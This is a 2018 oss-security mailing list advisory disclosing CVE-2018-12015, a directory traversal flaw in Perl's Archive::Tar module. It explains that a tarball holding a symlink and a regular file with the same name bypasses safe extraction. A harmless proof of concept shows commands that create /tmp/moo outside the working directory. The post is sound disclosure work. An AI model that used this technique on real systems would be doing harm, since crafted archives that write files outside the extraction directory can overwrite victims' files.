Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 7 Jun 2018 20:41:25 +0200
From: Salvatore Bonaccorso <carnil@...ian.org>
To: OSS Security Mailinglist <oss-security@...ts.openwall.com>
Subject: Perl: CVE-2018-12015: Archive::Tar: directory traversal vulnerability

Hi

The following dirctory traversal vulnerability was reporte to the
Debian bugtracker at https://bugs.debian.org/900834 , which got
assigned CVE-2018-12015 by MITRE (requested via the
http://cveform.mitre.org/):

> By default, the Archive::Tar module doesn't allow extracting files
> outside the current working directory. However, you can bypass this
> secure extraction mode easily by putting a symlink and a regular file
> with the same name into the tarball.
> 
> I've attached proof of concept tarball, which makes Archive::Tar create
> /tmp/moo, regardless of what the current working directory is:
> 
>   $ tar -tvvf traversal.tar.gz
>   lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
>   -rw-r--r-- root/root         4 2018-06-05 18:55 moo
> 
>   $ pwd
>   /home/jwilk
> 
>   $ ls /tmp/moo
>   ls: cannot access '/tmp/moo': No such file or directory
> 
>   $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
> 
>   $ ls /tmp/moo
>   /tmp/moo

The mentioned proof of concept tarball is attached to the Debian bug at
https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=900834;filename=traversal.tar.gz;msg=3
.

Regards,
Salvatore

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ